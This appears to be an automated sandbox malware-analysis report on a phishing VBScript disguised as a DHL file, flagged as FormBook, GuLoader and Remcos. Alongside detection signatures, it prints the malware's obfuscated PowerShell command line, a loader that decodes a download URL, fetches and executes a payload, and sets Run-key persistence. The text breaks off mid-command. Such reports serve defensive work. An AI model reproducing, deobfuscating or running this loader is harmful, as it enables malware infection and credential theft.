Windows
Analysis Report
DHL_ES567436735845755676678877988975877.vbs
Overview
General Information
Detection
FormBook, GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1992 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL_ES567436735845755676678877988975877.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 2132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gdnings = 1;$Tripe talous='S' ;$Tripetal ous+='ubst rin';$Trip etalous+=' g';Functio n Teucrium ($Gdskes){ $Expirable =$Gdskes.L ength-$gdn ings;For($ Heltemodig es=4; $Hel temodiges -lt $Expir able; $Hel temodiges+ =(5)){$Mir akeldoktor erne+=$Gds kes.$Tripe talous.Inv oke($Helte modiges, $ gdnings);} $Mirakeldo ktorerne;} function R egulerbare ($Reticula ria){& ($Bestandi gst) ($Ret icularia); }$Planlgge lserne235= Teucrium ' LeopMC,mpo Croz Frei Prpol.hril M rgaBri / Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon .lgndPreeo eksw,olis Sttt ,ppNu pt T Yie R ed1ud.i0 M ul.Fodb0 S ka; Skr As suWByttiOv ernSe.s6.o ti4El.x; T re DepexWh is6U mo4 D e,;Vsk, Al ir,entv St t:.aus1,es u2 Pic1Fag b.Cryp0 M t)W.tc D.l gGOpree np cTrickStig oSkgg/,jle 2 Kry0 Me 1S lt0Stoc 0Cruo1Frkk 0Sahu1Skru KontFSkan iPertrUpcr e Kiaf Val oNdrixLavr /Konv1Floc 2Scou1Appl .,ont0Stru ';$improv ers=Teucri um 'ArbeUD oubsTaleeP ianrTarv-, rogATwitgS clae P.lnt e stKlas ' ;$Ovariect omize=Teuc rium 'A rt hSemit Mas tSuffpDykk sNonp: Saa /Nedj/Orto eGensu Lym rjyd.oPime pBegirNgom oF,rst Jer e,agncanst t FidiSoci eVir,. T s r.fproCh.r /GlasMTri, e CiktArb, hmargiSemi n AaskNice 1phle. Tak tNonrhKdls nOver ';$A stor=Teucr ium 'Nonf> nd ';$Bes tandigst=T eucrium ' PleiL.doeS p,lxSkit ' ;$Executry 203='smitt efaren';Re gulerbare (Teucrium 'pugiSTeco ePelstDeta -ventCFl.l oDelinIndd tPrepeTilb nFreet Taa Lill-Ex.e PBehea.pso t Ab hPeri RakeT K,o :Gemm\Adju NTartvBoss n oce Matl Temps,obbe eu,o. 
    Fort EpipxEstht Bifr Whis- GarbV Refa Tor lUndeu BoreeHyl P ier$BlysE remxRe.peB igacDionuB nsktNonsr A,kyDoci2N edv0Term3r ,ma; Men ' );Regulerb are (Teucr ium 'Untri Ov.fHaem Sal,(Tudbt Brue Kuns app tZebr- alpNo sa .irt O qh Bi NoneTGe rm:Ecot\Re pNdor v S ton Mone A celToilsAg roeAfsk.Tr e.tFro x D eptHjlp)Eu ph{QuiceAf syxKvadiTe .rtSqui}M, le;Mi.l ') ;$Tearines s = Teucri um 'FrereD ynecScrahi mp.o Gid b rul%.ddea, uffp Hi pF ilhdMadnaN i,at Ma,aS kum%Ha g\B eavPOv rr NoleDiscs Mani iklgD iagnPappa t,slVed 2S hir3Bu g.s yndH,alla Konl Uni F l,&Pose&Ea te BylieBi llcAfhohPa nto Kns Ve s$tota '; Regulerbar e (Teucriu m 'P.lu$C. shgMa,tlAb onoEnthbAs peaUsorlK ap:Fores T imu Av,bAn ri Alinra m,sOprre F rerConjtSp ariUn coCr onnKass= T ek(Sprnc K remDertdM. lj Felt/ H aycMerc Ov er$romeT , rleLeveaSc rur Pa.i M isnKalde o rrsRaglsBe wh)Wamu ') ;Regulerba re (Teucri um 'Sku,$H avigAcrolD .inoVipebL mlea banlM rk: EarTD iobaWeevaU dbyl Ly mA ffao F,rdB ,rti C,ag Spkh Udse. ndbdAmin= Con$ tevOC arov.atra OdorPolyiR epreOvercT ordtSor.oS torm acciB e,nzSamdeB ybu.Mil,sr ek.pr onlD hoti usttL ivs(afsk$ .obA RegsB